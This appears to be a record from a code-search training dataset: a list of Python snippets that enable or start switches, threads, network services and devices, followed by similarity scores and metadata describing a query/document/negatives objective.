setter=self.ForwardingSetClass, options=[\"voice\",\"data\",\"voice+data\",\"fax\",\"voice+data+fax\"])\n self.SettingTargetNumber = tichy.settings.NumberSetting('Call Forwarding', 'Target Number', tichy.Text, value=self.ForwardingGet('number'), setter=self.ForwardingSetNumber)\n self.SettingTargetNumber = tichy.settings.NumberSetting('Call Forwarding', 'Timeout', tichy.Text, value=self.ForwardingGet('timeout'), setter=self.ForwardingSetTimeout)\n \n if len(self.logs) == 0: \n for i in range(3):\n call = Call('0049110', direction='out')\n 
self.logs.insert(0, call)\n yield None", "def EnableCPU():\n global option\n option['device'] = 'CPU'", "def start(self):\n for tlight in self.trafficLights:\n self.trafficLights[tlight].start()\n self.globalTimer = Timer(1, self.step)\n self.globalTimer.start()", "def connect(self):\n self.start()", "def __enable_connections(self):\r\n pass", "def enable(self, *args, **kwargs):\n pass", "def enable_motor():\n print('Enabling motor')\n start_motor = '{\"id\" : \"Motor1\", \"enabled\" : \"1\"}'\n SERIAL_PARENT.send(start_motor)\n OUTGOING.append(start_motor)", "def enable_receiver(self):\n self.set_receiver(True)", "def enable(self):\n self.enabled = True", "def enable(self):\n self.enabled = True", "def start(self):\n self.capturing = True\n print \"Connecting Sender\"\n self.sock.connect(self.addr)\n self.capture_thread.start()\n print \"Starting Sender\"\n self.sending_thread.start()", "def start_switch(self, switch_init_wait=3, route_mac=ROUTER_MAC):\n switch_id = sai_thrift_create_switch(\n self.test_obj.client, init_switch=True, src_mac_address=route_mac)\n self.test_obj.assertEqual(self.test_obj.status(), SAI_STATUS_SUCCESS)\n\n print(\"Waiting for switch to get ready, {} seconds ...\".format(\n switch_init_wait))\n time.sleep(switch_init_wait)\n return switch_id", "async def async_turn_on(self):\n path = \"/ip/firewall/nat\"\n param = \".id\"\n value = None\n for uid in self._ctrl.data[\"nat\"]:\n if (\n self._ctrl.data[\"nat\"][uid][\"name\"]\n == f\"{self._data['protocol']}:{self._data['dst-port']}\"\n ):\n value = self._ctrl.data[\"nat\"][uid][\".id\"]\n\n mod_param = \"disabled\"\n mod_value = False\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n await self._ctrl.force_update()", "def enable():\n configdb = ConfigDBConnector()\n configdb.connect()\n tunnel_info = {}\n tunnel_info['FLEX_COUNTER_STATUS'] = ENABLE\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"TUNNEL\", tunnel_info)", "def start_server(self):\n if self.esp_mgr.ap:\n self.server_socket = adafruit_esp32spi_socket.socket()\n self.esp_mgr.esp.start_server(23, self.server_socket.socknum)", "def start(self):\n \n self.thread.start()\n self.state = \"running\"", "def enable(self) -> None:", "def start(self):\n self.microblaze.run()\n self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET, 0)\n self.load_switch_config(self.iop_switch_config)", "def _enable(self):\n self.debug_log(\"Enabling...\")\n self._register_handlers()", "def start(self):\n\n if self.__bus_controller == None:\n print(\"can't start please pass me the needed dictionaries\")\n\n self.__global_messages = {\"kick reason\": \"\", \"free text\": \"\"}\n self.__lock_data = False\n self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.stop = False\n __main_loop = threading.Thread(target=self.__main_loop, args=(), name=\"bus updater\")\n __main_loop.start()", "def enable_gateway(self, enable_gateway):\n\n self._enable_gateway = enable_gateway", "def enable(self):\n pass", "async def async_turn_on(self, **kwargs: Any) -> None:\n run_time = self._manual_preset_runtime / 60\n if run_time == 0:\n _LOGGER.warning(\n \"Switch %s manual preset runtime is 0, watering has defaulted to %s minutes. 
Set the manual run time on your device or please specify number of minutes using the bhyve.start_watering service\",\n self._device_name,\n int(DEFAULT_MANUAL_RUNTIME.seconds / 60),\n )\n run_time = 5\n\n await self.start_watering(run_time)", "def tc_start(self, datapath, dpae_port):\n dpid = datapath.id\n self.logger.info(\"Starting TC to DPAE on datapath=%s, dpae_port=%s\",\n dpid, dpae_port)\n switch = self.switches[dpid]\n #*** Check if Active or Passive TC Mode:\n mode = self.main_policy.tc_policies.mode\n self.logger.info(\"TC mode=%s\", mode)\n #*** TBD, deal with context:\n context = self.context_default\n #*** Set up group table to send to DPAE:\n # NEEDS OVS 2.1 OR HIGHER SO COMMENTED OUT FOR THE MOMENT\n # ALSO NEEDS CODE THAT CAN CATER FOR MULTIPLE DPAE\n #switch.flowtables.add_group_dpae(out_port)\n\n if self.main_policy.identity.lldp:\n #*** Install FEs to send LLDP Identity indicators to DPAE:\n switch.flowtables.add_fe_iig_lldp(dpae_port)\n\n if self.main_policy.identity.dhcp:\n #*** Install FEs to send DHCP Identity indicators to DPAE:\n switch.flowtables.add_fe_iig_dhcp(dpae_port)\n\n if self.main_policy.identity.dns:\n #*** Install FEs to send DNS Identity indicators to DPAE:\n switch.flowtables.add_fe_iig_dns(dpae_port)\n\n if mode == 'active':\n #*** Install AMF entries for MACs we already know dest for:\n mac_list = switch.mactable.dump_macs(context)\n for mac in mac_list:\n self.logger.debug(\"Adding previously learned mac=%s dpid=%s \"\n \"dpae_port=%s to Active Mode Filter (amf)\", mac, dpid,\n dpae_port)\n switch.flowtables.add_fe_amf_macport_dst(dpae_port, mac)\n #*** Install FE to so packets returning from DPAE in active mode\n #*** bypass learning tables and go straight to treatment:\n switch.flowtables.add_fe_iim_dpae_active_bypass(dpae_port)\n\n #*** Add any general TC flows to send to DPAE if required by policy\n #*** (i.e. statistical or payload):\n switch.flowtables.add_fe_tc_dpae(\n self.main_policy.optimised_rules.get_rules(),\n dpae_port, mode)\n\n self.logger.info(\"TC started to DPAE on datapath=%s, dpae_port=%s\",\n dpid, dpae_port)\n _results = {\"status\": \"tc_started\",\n \"mode\": mode}\n return _results", "def cycle(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n self.off()\n time.sleep(2) # Small delay before calling power_on\n self.on()", "def start(self):\n\n address = (socket.gethostbyname(self.hostname), self.port)\n logger.info(\"Connecting to %r\" % (address,))\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.connect(address)\n self._start_processors()\n return self", "def enable(self):\n if not self.labExperiment:\n super().enable()\n else:\n self.connection.command('open_dm', self.DMserial)\n status = self.connection.query('get_status')\n assert status == 0, 'Error connecting to DM. 
Error: ' + str(status)\n numActProfile = self.connection.query('num_actuators')\n assert numActProfile == self.numActProfile, 'Wrong number of profile actuators entered'\n print(\"'BM1k' is now enabled\")", "def start_monitoring(self):\n pass", "def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.start_agents_once = False\n self.start_servers_once = False\n self.setup_start_agents = False\n self.setup_start_servers = False", "def turn_on(self, **kwargs):\n self._state = True\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device,'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":1 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":1 }', 5)", "def Bg_ping_start(host, options):\r\n BgPing.start_traffic(host, options)", "def begin_sending_packets():\n monitoru = main_monitoring.MainMonitoring()\n monitoru.start_monitor_loop()", "def startBackend():\n global started\n if started:\n return\n started = True\n print(\"Backend started\")", "def start(self):\n for workload in self._workloads:\n self.log.info(\"%-20s STARTING port=%s\" % (workload.name(), workload.port()))\n workload.pre_start()\n workload.start()\n self._monitor_loop()\n self._cleanup()", "def enable(self):\n self._enabled = True", "def enable_network_management(self):\n self._request({\"enable-network-management\": True})", "def turn_on(self, **kwargs: Any) -> None:\n if self.type == \"on_off\":\n _LOGGING.debug(\"Starting all torrents\")\n self._tm_client.api.start_torrents()\n elif self.type == \"turtle_mode\":\n _LOGGING.debug(\"Turning Turtle Mode of Transmission on\")\n self._tm_client.api.set_alt_speed_enabled(True)\n self._tm_client.api.update()", "def connectCPU(self, cpu):\n self.cpu_side = cpu.dcache_port", "async def __aenter__(self) -> \"SwitcherBridge\":\n await self.start()\n return self", "def _starting(self, sender, **kwargs):\n _log.info('Starting: {}'.format(self.__name__))\n self.vip.heartbeat.start()\n # _log.debug(self.vip.ping('', \"PING ROUTER?\").get(timeout=3))\n #\n q = query.Query(self.core)\n # TODO: Use all addresses for fallback, #114\n self._external_addresses = q.query(b'addresses').get(timeout=30)\n assert self._external_addresses\n self._serverkey = q.query(b'serverkey').get(timeout=30)\n\n _log.debug(\"external addresses are: {}\".format(\n self._external_addresses\n ))\n\n # self._local_address = q.query('local_address').get(timeout=30)\n # _log.debug('Local address is? 
{}'.format(self._local_address))\n _log.info('Registering jsonrpc and /.* routes with {}'.format(\n MASTER_WEB\n ))\n\n self.vip.rpc.call(MASTER_WEB, 'register_agent_route',\n r'^/jsonrpc.*',\n self.core.identity,\n 'jsonrpc').get(timeout=10)\n\n self.vip.rpc.call(MASTER_WEB, 'register_path_route', VOLTTRON_CENTRAL,\n r'^/.*', self._webroot).get(timeout=20)\n\n self.webaddress = self.vip.rpc.call(\n MASTER_WEB, 'get_bind_web_address').get(timeout=30)\n\n # Remove so that dynamic agents don't inherit the identity.\n os.environ.pop('AGENT_VIP_IDENTITY')", "def start(self):\n\t\tself.init_trajectory_gripper()\n\t\tself.gripperserver.start()\n\t\tprint(\"The action server for this driver has been started\")", "def setupHw():\n\n pin.setupHw()\n pin.setupOutPins(traffic_lights)\n pin.setDebug(False)", "def enable(ctx):\n\n config_db = ConfigDBConnector()\n config_db.connect()\n config_db.mod_entry(\"NAT_GLOBAL\", \"Values\", {\"admin_mode\": \"enabled\"})", "def activate():\n refresh()\n activate_connection_with_mainloop(get_uuid())", "def start_processing(self):", "def setup(self):\n self.log.debug('RFSwitch - in RFSwitch setup()')\n # Add resource setup code here\n print(\"Calling RFSwitch:setup\")", "def start_driving(self):\n\n self.stop_driving()\n self.drive_thread = DriveThread()\n self.drive_thread.start()", "def enable(self):", "def start(self):\r\n self.setDriver('ST', 1)", "def start():\n\n start_server()", "def activate_controller(self):\n if self.controller_address:\n #print \"Activating controller...\"\n self.controller = Controller(\n self.controller_address,\n self.proxy_address,\n self.migrating)\n self.controller.switch = self\n else:\n print \"[WARNING] Controller undefined\"", "def start_SLP_server(self):\n import slp\n \n s = self.op.get_value('mode_params')\n if len(s) == 0:\n print 'No parameter received'\n params = {}\n else:\n l_p = self.parse_params(s)\n params = {'action':[np.int(l_p[0])]}\n if len(l_p) == 2:\n params['image_feature_layer_name'] = l_p[1]\n slpserver = slp.SLPServerTrial(self, params)\n slpserver.start()", "def start(self):\n self.thread.start()", "def turn_on(self, **kwargs):\n self.smartplug.turn_on()", "def activate(self):\n if not self._env.enable_registration:\n return\n legacy_key = '{}:{}'.format(self._env.flask_host, self._env.flask_port)\n self._key = self._env.get('my_ident', legacy_key, 'microservice')\n LoopingCall(self.ping).start(5, now=False)", "def init(self):\n try:\n yield self._connect_dbus()\n logger.info(\"Request the GSM resource\")\n yield WaitFSOResource('GSM', time_out=30)\n yield WaitDBus(self.ousage.RequestResource, 'GSM')\n yield self._turn_on()\n logger.info(\"register on the network\")\n register = yield self._register()\n #if register:\n #provider = yield tichy.Wait(self, 'provider-modified')\n \n self._keep_alive().start()\n \n ##network selection end\n \n except Exception, ex:\n logger.error(\"Error : %s\", ex)\n raise\n \n try:\n \n yield tichy.Service.get('ConfigService').wait_initialized()\n self.config_service = tichy.Service.get(\"ConfigService\")\n logger.info(\"got config service\")\n \n except Exception, ex:\n logger.error(\"Error in try retrieving config service : %s\", ex)\n \n try:\n \n ##call forwaring setting start\n self.values = self.config_service.get_items(\"call_forwarding\")\n if self.values != None: self.values = dict(self.values)\n logger.info(\"realized values is none\")\n\n except Exception, ex:\n logger.error(\"Error in try call forwarding setting : %s\", ex)\n \n \n try:\n\n self.SettingReason = 
tichy.settings.ListSetting('Call Forwarding','Reason',tichy.Text,value='unconditional', setter=self.ForwardingSetReason,options=[\"unconditional\",\"mobile busy\",\"no reply\",\"not reachable\",\"all\",\"allconditional\"],model=tichy.List([ ListSettingObject(\"unconditional\", self.action),ListSettingObject(\"mobile busy\",self.action),ListSettingObject(\"no reply\", self.action),ListSettingObject(\"not reachable\", self.action),ListSettingObject(\"all\", self.action),ListSettingObject(\"all conditional\", self.action)]), ListLabel =[('title','name')])\n \n self.SettingForwarding = tichy.settings.ToggleSetting('Call Forwarding', 'active', tichy.Text, value=self.GetForwardingStatus('unconditional'),setter=self.ToggleForwarding, options=['active','inactive'])\n \n \n except Exception, ex:\n logger.error(\"Error in try call forwarding setting list : %s\", ex)\n \n \n try:\n\n self.SettingChannels = tichy.settings.Setting('Call Forwarding', 'channels', tichy.Text, value=self.ForwardingGet('class'), setter=self.ForwardingSetClass, options=[\"voice\",\"data\",\"voice+data\",\"fax\",\"voice+data+fax\"])\n \n self.SettingTargetNumber = tichy.settings.NumberSetting('Call Forwarding', 'Target Number', tichy.Text, value=self.ForwardingGet('number'), setter=self.ForwardingSetNumber)\n \n self.SettingTargetNumber = tichy.settings.NumberSetting('Call Forwarding', 'Timeout', tichy.Text, value=self.ForwardingGet('timeout'), setter=self.ForwardingSetTimeout)\n \n ##call forwaring setting stop\n \n \n except Exception, ex:\n logger.error(\"Error in try Error in try call forwarding setting : %s\", ex)\n \n try:\n\n ##call identifaction setting start\n self.CallIdentification = tichy.settings.Setting('Network', 'Call Identification', tichy.Text, value=self.GetCallIdentification(), setter=self.SetCallIdentifaction, options=[\"on\",\"off\",\"network\"])\n ##call identifaction setting stop\n \n except Exception, ex:\n logger.error(\"Error in network identification setting: %s\", ex)\n \n try: \n ##network selection etc begin\n self.NetworkRegistration = tichy.settings.Setting('Network', 'Registration', tichy.Text, value=self.GetRegStatus(), setter=self.SetRegStatus, options=[\"registered\",\"not registered\"])\n \n \n except Exception, ex:\n logger.error(\"Error in network registration setting : %s\", ex)\n \n \n try:\n \n self.scanning = False\n self.NetworkList = tichy.List()\n self.ListLabel = [('title','name'),('subtitle','status')]\n \n self.scan_setting = tichy.settings.ListSetting('Network', 'List', tichy.Text, value=\"scan\", setter=self.run_scan, options=['scan'], model=self.NetworkList, ListLabel=self.ListLabel)\n \n except Exception, ex:\n logger.error(\"Error in network list setting : %s\", ex)\n #raise", "def start_traffic(self, context: ResourceCommandContext, blocking: str) -> None:\n self.handler.start_traffic(blocking)", "def activate(self):\n super(Pfsense, self).activate()\n default_identifier = self.config.get('DEFAULT_IDENTIFIER_STR', '')\n if not default_identifier:\n self.log.warn('No default identifier set')\n\n self.default_identifier = self.build_identifier(default_identifier)\n self.thread = threading.Thread(target=log_thread, args=(self,))\n\n self.dns_cache = DNSCache()\n self.dns_cache.start()\n self.running = False", "def enable(self):\n\n self._slo_examples_per_batch.enable()\n self._slo_number_of_epochs.enable()\n self._slo_neural_network.enable()\n self._slo_image_size.enable()\n super().enable()", "def start(self):\n self._setup_thread()\n self.thread.start()", "def 
start_run(self, context: RobotRunnerContext) -> None:\n rospy.init_node(\"robot_runner\", disable_signals=True)\n self.ina219_profiler = INA219ProfilerClient()\n self.cpu_mem_profiler = ResourceProfilerClient()", "def start( self ):\n\n self.service()", "def setup_gateway(self, args):\n if args.preponly:\n return\n\n # edit the gateway properties file and restart the gateway\n # mdm.ip.addresses = <addresses of node0,node1>\n # security.bypass_certificate_check = true\n _config = '/opt/emc/scaleio/gateway/webapps/ROOT/WEB-INF/classes/gatewayUser.properties'\n _commands = []\n #_commands.append(\"sed -i 's|^mdm.ip.addresses.*|mdm.ip.addresses={},{}|' {}\".format(args.IP[0], args.IP[1], _config))\n #_commands.append(\"sed -i 's|^security.bypass_certificate_check.*|security.bypass_certificate_check=true|' {}\".format( _config))\n _commands.append(\"systemctl restart scaleio-gateway\")\n self.node_execute_multiple(args.IP[2], args.USERNAME, args.PASSWORD, _commands)\n return", "def enable_scp(self) -> None:\n if self.is_active():\n device: ASADevice = self\n else:\n device = self.peer_device\n\n if not device.is_active():\n log.error(\"Host %s: Unable to establish a connection with the active device\", self.host)\n raise FileTransferError\n\n try:\n device.config(\"ssh scopy enable\")\n except CommandError:\n log.error(\"Host %s: Unable to enable scopy on the device\", self.host)\n raise FileTransferError\n\n log.info(\"Host %s: ssh copy enabled.\", self.host)\n device.save()", "def start(self) -> None:\n self.stopping.clear()\n self.thread = threading.Thread(target=self._run, daemon=True, name=self.thread_name)\n self.thread.start()", "def start(self):\n #url = '{}://{}:{}/'.format('http',\n # self.ip,\n # self.port)\n #self.service_info = ServiceInfo(\n # '_webthing._sub._http._tcp.local.',\n # '{}._http._tcp.local.'.format(self.name),\n # address=socket.inet_aton(self.ip),\n # port=self.port,\n # properties={\n # 'url': url,\n # },\n # server='{}.local.'.format(socket.gethostname()))\n #self.zeroconf = Zeroconf()\n #self.zeroconf.register_service(self.service_info)\n\n # If WebSocketS used and NOT running in thread, and WebServer IS\n # running in thread make shure WebServer has enough stack size to\n # handle also the WebSocket requests.\n log.info('Starting Web Server')\n self.server.Start(threaded=srv_run_in_thread, stackSize=8192)", "def tcp_start(self, flow: mitmproxy.tcp.TCPFlow):", "def _on_start_cycle(self, kwargs: dict) -> None:\n self._on_toggle_and_run({\"state\": \"on\"})", "def start_execution(self):\n self.send_message(\"control.start\",None)", "def start(self):\n if self.is_alive:\n self.logger.warning('Already started!')\n return\n self._create_tunnels()\n if not self.is_active:\n self._raise(BaseSSHTunnelForwarderError,\n reason='Could not establish session to SSH gateway')\n for _srv in self._server_list:\n thread = threading.Thread(\n target=self._serve_forever_wrapper,\n args=(_srv, ),\n name='Srv-{0}'.format(address_to_str(_srv.local_port))\n )\n thread.daemon = self.daemon_forward_servers\n thread.start()\n self._check_tunnel(_srv)\n self.is_alive = any(self.tunnel_is_up.values())\n if not self.is_alive:\n self._raise(HandlerSSHTunnelForwarderError,\n 'An error occurred while opening tunnels.')", "def enable_service(service_name, start_type='auto'):\n run_program(['sc', 'config', service_name, 'start=', start_type])", "def run(self):\n self.network_ctrl.connect_with_remote_system()\n cmd = self.create_command(self.on_or_off, self.port)\n 
self.network_ctrl.send_command(cmd)\n\n check = self._port_status(self.port)\n result = self.network_ctrl.send_command(check)\n result = result[0]\n if self.on_or_off:\n if result == \"1\":\n self.router.mode = Mode.normal\n logging.info(\"[+] Successfully switched on port \" + str(self.port))\n else:\n self.router.mode = Mode.unknown\n logging.info(\"[-] Error switching on port \" + str(self.port))\n else:\n if result == \"0\":\n self.router.mode = Mode.off\n logging.info(\"[+] Successfully switched off port \" + str(self.port))\n else:\n self.router.mode = Mode.unknown\n logging.info(\"[-] Error switching off port \" + str(self.port))\n\n self.network_ctrl.exit()", "def startSpawing(self):\n self.girderManager.startSpawing()", "def prepare_monitor_before(self):\n\t\tself.prepare_sysctl()\n\t\tself.clean_kernel_log()\n\t\tself.start_tcpdump()\n\t\tif self.cfg.enable_inetsim:\n\t\t\tself.start_network_nat()\n\t\t\tself.start_inetsim()", "async def enable(self, **kwargs) -> None: # pylint: disable=unused-argument\r\n await self.set_ena(True)", "def start(self, _):\n logger.debug(\"Spawning metric & span reporting threads\")\n self.should_threads_shutdown.clear()\n self.sensor.start()\n instana.singletons.tracer.recorder.start()" ]
[ "0.633651", "0.63337624", "0.627072", "0.62615603", "0.6093382", "0.6046594", "0.595381", "0.5936305", "0.58609205", "0.58298725", "0.5779756", "0.57681865", "0.5766365", "0.5766356", "0.5763502", "0.57629", "0.57612556", "0.5747415", "0.5741657", "0.57210463", "0.5721009", "0.5691176", "0.56485105", "0.5615015", "0.5595959", "0.5588712", "0.55703497", "0.5539881", "0.55389404", "0.5538847", "0.5523063", "0.5521473", "0.55048585", "0.55048585", "0.5504399", "0.5502472", "0.5484939", "0.5480258", "0.5480209", "0.54790616", "0.5477981", "0.5471683", "0.54678005", "0.54673564", "0.54611987", "0.54508555", "0.5446314", "0.54429257", "0.54423994", "0.54404306", "0.5430337", "0.54303086", "0.54254884", "0.54253703", "0.5416758", "0.54113513", "0.540692", "0.5405405", "0.5403963", "0.5396331", "0.5396149", "0.53898567", "0.5386838", "0.538426", "0.53817093", "0.5381634", "0.5376393", "0.53754157", "0.53691596", "0.53662217", "0.53610945", "0.5354829", "0.5353068", "0.53528726", "0.5345553", "0.5342972", "0.53407556", "0.5338358", "0.53383064", "0.5331773", "0.5330794", "0.5324194", "0.5322941", "0.5321635", "0.5321385", "0.53211427", "0.53145576", "0.5307298", "0.53046614", "0.5301705", "0.5299074", "0.5296493", "0.5290057", "0.52839404", "0.52787715", "0.5277756", "0.5271273", "0.52711415", "0.5268121", "0.526721" ]
0.7502978
0
Disable the switch instance. Packets on ingress are discarded while the switch is disabled. Traffic manager threads are not stopped.
def disable(self): logging.debug("Disabling switch %s" % self.name) self.disabled = True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def async_turn_off(self):\n path = \"/ip/firewall/nat\"\n param = \".id\"\n value = None\n for uid in self._ctrl.data[\"nat\"]:\n if (\n self._ctrl.data[\"nat\"][uid][\"name\"]\n == f\"{self._data['protocol']}:{self._data['dst-port']}\"\n ):\n value = self._ctrl.data[\"nat\"][uid][\".id\"]\n\n mod_param = \"disabled\"\n mod_value = True\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n await self._ctrl.async_update()", "def disable(self):\n self._disable_monitor()\n self._pinger.stop()", "def disable_switch_port(self, mgr, interface):\n confstr = snipp.CMD_NO_SWITCHPORT % (interface)\n confstr = self.create_xml_snippet(confstr)\n LOG.debug(\"NexusDriver: %s\" % confstr)\n mgr.edit_config(target='running', config=confstr)", "def on_disable(self) -> None:\n self._on_stop_cycle({})", "def disable(self):\n\n super().disable()\n self._slo_image_size.disable()\n self._slo_neural_network.disable()\n self._slo_number_of_epochs.disable()\n self._slo_examples_per_batch.disable()", "def _disable(self):\n self.enabled = False", "def turn_off(self):\n self._state = False\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":0 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'): \n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":0 }', 5)", "def switch_off_traffic_lights(self):\n for actor in self.world.get_actors():\n if actor.type_id == 'traffic.traffic_light':\n actor.freeze(True)\n # We set the traffic light to 'green' because 'off' state sets the traffic light to\n # 'red'.\n actor.set_state(carla.TrafficLightState.Green)", "def off_switch(self):\n self._switch_callback = None", "def switch_off(self):\n if threading.current_thread() != self._blinking_thread:\n self._blinking_thread.unregister(self)\n GPIO.output(self.pin, GPIO.LOW)", "def stop_traffic(self):\n self._logger.debug(\"stop_traffic()\")", "def set_disabled_switch(self, disabled):\n self.disabled = disabled", "def disable_output(self):\n\n self.__rtcconfig = self.__helper.updatebyte(self.__rtcconfig, 7, 0)\n self.__rtcconfig = self.__helper.updatebyte(self.__rtcconfig, 4, 0)\n self.__bus.write_byte_data(\n self.__rtcaddress, self.CONTROL, self.__rtcconfig)\n return", "def disable(self):\n self.error_code = 'DISABLED'\n self.running = False", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n tunnel_info = {}\n tunnel_info['FLEX_COUNTER_STATUS'] = DISABLE\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"TUNNEL\", tunnel_info)", "def disable(ctx):\n config_db = ConfigDBConnector()\n config_db.connect()\n config_db.mod_entry(\"NAT_GLOBAL\", \"Values\", {\"admin_mode\": \"disabled\"})", "def disable(self):\n self.enabled = False", "def disable(self):\n self._enabled = False", "async def async_set_wifi_led_off(self):\n return", "def firewallOff():\n pass", "def Bg_ping_stop():\r\n BgPing.stop_traffic()", "def stop_traffic(self):\n raise NotImplementedError(\n \"The TrafficController does not implement\",\n \"the \\\"stop_traffic\\\" function.\")", "def ethernet_off(self):\n if not self.healthy:\n self.health_check()\n if not self._ethernet_switch:\n raise errors.CapabilityNotReadyError(\n device_name=self._device_name,\n msg=\"Not set up for ethernet switching.\")\n self._ethernet_switch.switch_power.power_off(self.ethernet_port_number)", "def turn_off(self, **kwargs: 
Any) -> None:\n if (\n DPCODE_LIGHT in self.tuya_device.status\n and DPCODE_SWITCH not in self.tuya_device.status\n ):\n commands = [{\"code\": DPCODE_LIGHT, \"value\": False}]\n else:\n commands = [{\"code\": DPCODE_SWITCH, \"value\": False}]\n self._send_command(commands)", "def disable_relays(self):\n #ensure clock low and data high\n self.e.clear_bit(7)\n self.e.set_bit(5)\n time.sleep(0.01)\n\n #pulse the clock line\n self.e.set_bit(7)\n time.sleep(0.01)\n self.e.clear_bit(7)\n\n #clear the data line\n self.e.clear_bit(5)", "def disable(self):", "def disable():\n request = dict(id='gbn')\n _gbn_disable(request)", "def disable(self) -> None:", "def turn_off(self, **kwargs) -> None:\n self.wink.set_state(False)", "def _disable(self):\n self.debug_log(\"Disabling...\")\n self._unregister_handlers()", "def scp_disable(task):\n cmd = \"no ip scp server enable\"\n task.run(task=netmiko_send_config, config_commands=cmd)\n task.run(task=netmiko_save_config)\n c_print(f\"*** {task.host}: SCP has been disabled ***\")", "def _disable_wifi_ap(self):\n call(['systemctl', 'disable', 'hostapd', ])\n call(['systemctl', 'disable', 'dnsmasq', ])\n\n context = self._get_ap_context()\n self._write_system_template('/etc/network/interfaces', 'interfaces.conf', context)\n self._write_system_template('/etc/dhcpcd.conf', 'dhcpcd.conf', context)", "def disable(self):\n pass", "def on_disable(self) -> None:\n self._cancel_notification_cycle()", "def _led_disable():\n # type: () -> None\n GPIO.output(LED_nOE, GPIO.HIGH)", "def disable_server(self, server):\n log.info(\"Disabling %s in netscaler\", server)\n return self.post(\"server?action=disable\", {\"server\": {\"name\": server}}, content_type=self.content_type(\"server\"))", "def unpause(self, instance):\n self.power_on(\n context=None,\n instance=instance,\n network_info=None,\n block_device_info=None)", "def switch_off(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def clean_rebind_test(**kwargs):\n if 'verify_traffic' not in kwargs:\n kwargs['verify_traffic'] = False\n prepare_subscriber_traffic(**kwargs)\n device_id = kwargs.get('device_id', bbe.get_devices(device_tags='dut', id_only=True)[0])\n switch_id = kwargs.get('switch_id', 'r1')\n switch_handle = t.get_handle(switch_id)\n switch_access_intf = bbe.get_interfaces(switch_id, interfaces='access')\n status = True\n for iteration in range(1, int(kwargs.get('iteration', 1)) + 1):\n t.log(\"disable access ports in switch in iteration #{}\".format(iteration))\n port_command_list = []\n status = True\n for access in switch_access_intf:\n port_command_list.append(\"set interfaces {} disable\".format(access.interface_pic))\n switch_handle.config(command_list=port_command_list)\n switch_handle.commit()\n t.log(\"verify access ports in down state\")\n for access in switch_access_intf:\n resp = switch_handle.pyez('get_interface_information', level_extra='terse',\n interface_name=access.interface_pic).resp\n if resp.findtext('physical-interface/admin-status') == 'down' and resp.findtext(\n 'physical-interface/oper-status') == 'down':\n t.log(\"interface {} is in down state\".format(access.interface_pic))\n else:\n t.log('WARN', \"interface {} is in state {}\".format(access.interface_pic, resp))\n status = False\n\n if not status:\n for access in switch_access_intf:\n port_command_list.append(\"delete interfaces {} disable\".format(access.interface_pic))\n switch_handle.config(command_list=port_command_list)\n switch_handle.commit()\n raise Exception(\"some interfaces failed to be in 
down state after disable\")\n base_time = time.time()\n while time.time() - base_time < 1800:\n router_count = get_router_sub_summary(device_id)['client']\n tester_count = get_rt_subs_info()['rt_sessions_up']\n if router_count == 0 and tester_count == 0:\n duration = time.time() - base_time\n t.log(\"all subscribers cleared from tester and router after {}s in iteration #{}\".format(duration,\n iteration))\n break\n t.log(\"sleep 30s , waiting for clients cleared\")\n time.sleep(30)\n\n result = get_router_sub_summary(device_id)\n\n if result['client'] != 0 or 'terminated' in result or 'terminating' in result or 'init' in result:\n status = False\n t.log('WARN', 'some subscribers stuck in unexpected state in iteration #{}'.format(iteration))\n\n for access in switch_access_intf:\n port_command_list.append(\"delete interfaces {} disable\".format(access.interface_pic))\n switch_handle.config(command_list=port_command_list)\n switch_handle.commit()\n time.sleep(10)\n t.log(\"verify access ports in up state in iteration {}\".format(iteration))\n for access in switch_access_intf:\n resp = switch_handle.pyez('get_interface_information', level_extra='terse',\n interface_name=access.interface_pic).resp\n if resp.findtext('physical-interface/admin-status') == 'up' and resp.findtext(\n 'physical-interface/oper-status') == 'up':\n t.log(\"interface {} is in up state\".format(access.interface_pic))\n else:\n t.log('WARN', \"interface {} is in state {}\".format(access.interface_pic, resp))\n status = False\n\n if not status:\n raise Exception(\"clean test failed\")\n ##set the rt subscriber state to stopped, since it is not teared down by actions\n t.log(\"login subscriber and verify traffic after restore the connection in iteration #{}\".format(iteration))\n prepare_subscriber_traffic(**kwargs)", "def wifi_off(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE00\")\n time.sleep(100e-3)", "def turn_off(self):\n print(\"Turning the lights off\")\n self.led.all_off()\n self.client.publish(STATE_TOPIC, OFF) #publish", "def stop_traffic(self, context: ResourceCommandContext) -> None:\n self.handler.stop_traffic()", "def turn_off(self, **kwargs):\n setattr(self.resource, self.variable, False)", "def disable(ctx):\n fc_info = {}\n fc_info['FLEX_COUNTER_STATUS'] = 'disable'\n ctx.obj.mod_entry(\"FLEX_COUNTER_TABLE\", \"FLOW_CNT_ROUTE\", fc_info)", "def pswitchoff(chan) :\n s.phaseSwitching(False, chan)", "async def async_turn_off(self):\n path = \"/interface\"\n param = \"default-name\"\n if \"-\" in self._data[\"port-mac-address\"]:\n param = \"name\"\n value = self._data[param]\n mod_param = \"disabled\"\n mod_value = True\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n\n if 